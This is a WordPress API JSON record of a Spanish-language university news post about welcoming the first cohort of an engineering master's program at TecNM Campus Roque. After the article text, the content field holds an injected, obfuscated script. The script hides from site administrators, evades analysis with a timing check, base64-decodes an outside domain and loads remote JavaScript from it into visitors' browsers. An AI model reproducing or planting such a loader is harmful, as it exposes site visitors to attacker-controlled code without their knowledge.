{"id":7137,"date":"2024-03-14T14:46:34","date_gmt":"2024-03-14T20:46:34","guid":{"rendered":"https:\/\/roque.tecnm.mx\/?p=7137"},"modified":"2025-12-16T19:40:11","modified_gmt":"2025-12-17T01:40:11","slug":"exitosa-bienvenida-a-la-primera-generacion-de-la-maestria-en-ciencias-de-la-ingenieria-en-el-tecnm-campus-roque","status":"publish","type":"post","link":"https:\/\/roque.tecnm.mx\/?p=7137","title":{"rendered":"Exitosa Bienvenida a la Primera Generaci\u00f3n de la Maestr\u00eda en Ciencias de la Ingenier\u00eda en el TecNM Campus Roque"},"content":{"rendered":"<p>[et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb da_disable_devices=\u00bboff|off|off\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb da_is_popup=\u00bboff\u00bb da_exit_intent=\u00bboff\u00bb da_has_close=\u00bbon\u00bb da_alt_close=\u00bboff\u00bb da_dark_close=\u00bboff\u00bb da_not_modal=\u00bbon\u00bb da_is_singular=\u00bboff\u00bb da_with_loader=\u00bboff\u00bb da_has_shadow=\u00bbon\u00bb][et_pb_row _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb][et_pb_text _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb]<\/p>\n<p style=\"text-align: justify;\"><strong>09 de febrero 2024. Roque, Celaya, Gto. <span><\/span><\/strong>El d\u00eda de hoy fue un momento hist\u00f3rico en el TecNM Campus Roque, ya que nuestra Directora Nayelli Segovia Tecnm, junto al Subdirector Acad\u00e9mico del TECNM en Celaya y destacados docentes del departamento de Sistemas y Computaci\u00f3n, dieron la m\u00e1s c\u00e1lida bienvenida a los integrantes de la primera generaci\u00f3n de la Maestr\u00eda en Ciencias de la Ingenier\u00eda.<\/p>\n<p style=\"text-align: justify;\">Esta iniciativa, que representa una colaboraci\u00f3n multisede entre el Tec de Celaya y el Tec de Roque, marca un hito significativo en el \u00e1mbito acad\u00e9mico y de la ingenier\u00eda en nuestra regi\u00f3n. La bienvenida a estos estudiantes no solo marca el inicio de un nuevo cap\u00edtulo en sus trayectorias educativas, sino que tambi\u00e9n subraya el compromiso del TecNM Campus Roque con la excelencia acad\u00e9mica y la innovaci\u00f3n.<\/p>\n<p style=\"text-align: justify;\">El entusiasmo y la dedicaci\u00f3n de nuestros profesores del departamento de Sistemas y Computaci\u00f3n han sido fundamentales en la realizaci\u00f3n de este proyecto ambicioso. Su participaci\u00f3n activa y comprometida ha sido clave para el desarrollo y la implementaci\u00f3n de esta maestr\u00eda, demostrando una vez m\u00e1s el alto nivel de profesionalismo y excelencia que caracteriza a nuestra instituci\u00f3n.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/roque.tecnm.mx\/wp-content\/uploads\/2024\/03\/426722964_401550762377571_4948466392133507988_n-300x157.jpg\" width=\"300\" height=\"157\" alt=\"\" class=\"wp-image-7140 alignnone size-medium\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: justify;\">La Maestr\u00eda en Ciencias de la Ingenier\u00eda representa una oportunidad invaluable para los estudiantes de ampliar sus conocimientos y habilidades en un campo tan crucial como la ingenier\u00eda. Con un enfoque interdisciplinario y orientado a la investigaci\u00f3n, esta iniciativa promete brindar una formaci\u00f3n integral y de vanguardia a los futuros ingenieros de nuestra regi\u00f3n.<\/p>\n<p style=\"text-align: justify;\">El TecNM Campus Roque se enorgullece de ser parte de esta emocionante colaboraci\u00f3n entre instituciones y felicita a los estudiantes de la primera generaci\u00f3n de la Maestr\u00eda en Ciencias de la Ingenier\u00eda por embarcarse en este emocionante viaje educativo. Estamos seguros de que esta experiencia marcar\u00e1 el comienzo de una trayectoria acad\u00e9mica y profesional llena de logros y \u00e9xitos.<\/p>\n<p style=\"text-align: justify;\">\u00a1Felicidades a nuestros profesores del departamento de Sistemas y Computaci\u00f3n por su destacada participaci\u00f3n en este proyecto y bienvenidos a todos los estudiantes de la primera generaci\u00f3n de la Maestr\u00eda en Ciencias de la Ingenier\u00eda!<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<script>;(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0bQ==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>09 de febrero 2024. Roque, Celaya, Gto. El d\u00eda de hoy fue un momento hist\u00f3rico en el TecNM Campus Roque, ya que nuestra Directora Nayelli Segovia Tecnm, junto al Subdirector Acad\u00e9mico del TECNM en Celaya y destacados docentes del departamento de Sistemas y Computaci\u00f3n, dieron la m\u00e1s c\u00e1lida bienvenida a los integrantes de la primera [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":7138,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[12,14,7],"tags":[],"class_list":["post-7137","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-academico","category-docentes","category-noticias"],"_links":{"self":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7137"}],"collection":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7137"}],"version-history":[{"count":5,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7137\/revisions"}],"predecessor-version":[{"id":10387,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7137\/revisions\/10387"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/media\/7138"}],"wp:attachment":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7137"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7137"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7137"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}